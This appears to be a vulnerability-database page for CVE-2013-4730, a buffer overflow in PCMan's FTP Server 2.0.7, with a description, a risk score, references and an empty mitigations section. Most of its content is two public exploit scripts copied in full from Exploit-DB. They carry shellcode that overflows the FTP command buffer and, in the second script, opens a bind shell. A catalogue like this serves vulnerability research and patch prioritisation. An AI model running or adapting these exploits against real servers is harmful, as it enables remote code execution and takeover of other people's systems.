CVE-2013-4730
critical
CVSS v3
—
CVSS v4 NEW
—
VIR risk
10.0
Description
Buffer overflow in PCMan's FTP Server 2.0.7 allows remote attackers to execute arbitrary code via a long string in a USER command.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
PCMan FTP Server 2.0 - Remote Buffer Overflow
#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Remote Buffer Overflow Exploit
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
# EAX 00000000
# ECX 00830A70
# EDX 00000030
# EBX 00000000
# ESP 0018ED70 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EBP 01F214A0
# ESI 0018ED87 ASCII "AAAAAAAAAAAAAAAAAAAAA
# EDI 00000004
# EIP 41414141
#
####################################################################
import socket
import sys
USER = "anonymous"
PASSWD = "TEST"
PAYLOAD = "\x41" * 2010
EIP = "\xDB\xFC\x1C\x75" # 751CFCDB JMP ESP USER32.DLL
NOP = "\x90" * 10
SHELLCODE =(
"\xba\x38\xdc\x15\x77\xdd\xc7\xd9\x74\x24\xf4\x5d\x33\xc9"
"\xb1\x33\x83\xc5\x04\x31\x55\x0e\x03\x6d\xd2\xf7\x82\x71"
"\x02\x7e\x6c\x89\xd3\xe1\xe4\x6c\xe2\x33\x92\xe5\x57\x84"
"\xd0\xab\x5b\x6f\xb4\x5f\xef\x1d\x11\x50\x58\xab\x47\x5f"
"\x59\x1d\x48\x33\x99\x3f\x34\x49\xce\x9f\x05\x82\x03\xe1"
"\x42\xfe\xec\xb3\x1b\x75\x5e\x24\x2f\xcb\x63\x45\xff\x40"
"\xdb\x3d\x7a\x96\xa8\xf7\x85\xc6\x01\x83\xce\xfe\x2a\xcb"
"\xee\xff\xff\x0f\xd2\xb6\x74\xfb\xa0\x49\x5d\x35\x48\x78"
"\xa1\x9a\x77\xb5\x2c\xe2\xb0\x71\xcf\x91\xca\x82\x72\xa2"
"\x08\xf9\xa8\x27\x8d\x59\x3a\x9f\x75\x58\xef\x46\xfd\x56"
"\x44\x0c\x59\x7a\x5b\xc1\xd1\x86\xd0\xe4\x35\x0f\xa2\xc2"
"\x91\x54\x70\x6a\x83\x30\xd7\x93\xd3\x9c\x88\x31\x9f\x0e"
"\xdc\x40\xc2\x44\x23\xc0\x78\x21\x23\xda\x82\x01\x4c\xeb"
"\x09\xce\x0b\xf4\xdb\xab\xe4\xbe\x46\x9d\x6c\x67\x13\x9c"
"\xf0\x98\xc9\xe2\x0c\x1b\xf8\x9a\xea\x03\x89\x9f\xb7\x83"
"\x61\xed\xa8\x61\x86\x42\xc8\xa3\xe5\x05\x5a\x2f\xc4\xa0"
"\xda\xca\x18");
print("\n\n[+] PCMan's FTP Server 2.0 Rrmote Buffer Overflow Exploit")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
data = s.recv(1024)
print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)
print("[-] Sending exploit...\n")
s.send(PAYLOAD + EIP + NOP +SHELLCODE +'\r\n')
s.close()
print("[!] Done! Exploit successfully sent\n")PCMan FTP Server 2.0.7 - 'MKD' Remote Buffer Overflow
Source code queued for fetch — refresh in a moment.
PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow
Source code queued for fetch — refresh in a moment.
PCMan FTP Server 2.07 - 'CWD' Remote Buffer Overflow
Source code queued for fetch — refresh in a moment.
PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow
Source code queued for fetch — refresh in a moment.
PCMan FTP Server 2.07 - 'STOR' Remote Buffer Overflow
Source code queued for fetch — refresh in a moment.
PCMan FTP Server 2.07 - 'STOR' Remote Stack Overflow (Metasploit)
Source code queued for fetch — refresh in a moment.
PCMan FTP Server 2.07 - Remote Buffer Overflow
# Exploit Title: PCMAN FTP 2.07 Long Command Buffer Overflow (unauthenticated)
# Date: Feb 19, 2014
# Exploit Author: Sumit
# Version: 2.07
# Tested on: Windows XP Professional SP3
# Description: Buffer overflow is triggered upon sending long string to PCMAN FTP 2.07 in place of command
#
import socket
import datetime
"""
You have to take into account your IP addr and servers date (if using NAT, check external IP) as buffer starts like the following:
2014/2/20 [00:40] (00320) 127.0.0.100> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
"""
host = '192.168.213.10'
d = str(datetime.datetime.today()).split()[0].split('-') # You should ideally consider servers date here
for i in range(len(d)): d[i] = str(int(d[i]))
d = '/'.join(d) # Finally we got the date
# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d'
shellcode = (
"\xda\xdb\xd9\x74\x24\xf4\xbe\xb5\x40\x16\xb6\x5b\x2b\xc9" +
"\xb1\x56\x31\x73\x18\x83\xeb\xfc\x03\x73\xa1\xa2\xe3\x4a" +
"\x21\xab\x0c\xb3\xb1\xcc\x85\x56\x80\xde\xf2\x13\xb0\xee" +
"\x71\x71\x38\x84\xd4\x62\xcb\xe8\xf0\x85\x7c\x46\x27\xab" +
"\x7d\x66\xe7\x67\xbd\xe8\x9b\x75\x91\xca\xa2\xb5\xe4\x0b" +
"\xe2\xa8\x06\x59\xbb\xa7\xb4\x4e\xc8\xfa\x04\x6e\x1e\x71" +
"\x34\x08\x1b\x46\xc0\xa2\x22\x97\x78\xb8\x6d\x0f\xf3\xe6" +
"\x4d\x2e\xd0\xf4\xb2\x79\x5d\xce\x41\x78\xb7\x1e\xa9\x4a" +
"\xf7\xcd\x94\x62\xfa\x0c\xd0\x45\xe4\x7a\x2a\xb6\x99\x7c" +
"\xe9\xc4\x45\x08\xec\x6f\x0e\xaa\xd4\x8e\xc3\x2d\x9e\x9d" +
"\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
"\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
"\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
"\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
"\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
"\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
"\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
"\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
"\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
"\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
"\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
"\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
"\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
"\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
"\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
"\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
"\x18\x37\x4e\x32")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 21))
nop = '\x90'*50
eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll
myip = s.getsockname()[0]
padding = 'A' * (2029 - (len(d) + len(myip)))
buf = padding + eip + nop + shellcode
s.send('%s\r\n' % (buf))
s.recv(1024)
print 'Payload sent'
s.close()PCMan FTP Server 2.0.7 - Remote (Metasploit)
Source code queued for fetch — refresh in a moment.
PCMan FTP Server 2.07 - 'ABOR' Remote Buffer Overflow
Source code queued for fetch — refresh in a moment.
Metasploit modules
Source fetch failed: fetch_error — view the original via the link above.
Source fetch failed: fetch_error — view the original via the link above.
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| pcman\'s_ftp_server_project | pcman\'s_ftp_server | 2.0.7 | |
References
- http://infosec42.blogspot.com/2013/06/unauthenticated-pcman-ftp-207-buffer.html
- http://osvdb.org/show/osvdb/94624
- http://www.exploit-db.com/exploits/26471
- http://www.securityfocus.com/bid/60837
- http://infosec42.blogspot.com/2013/06/unauthenticated-pcman-ftp-207-buffer.html
- http://osvdb.org/show/osvdb/94624
- http://www.exploit-db.com/exploits/26471
- http://www.securityfocus.com/bid/60837
CWEs
CWE-119
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.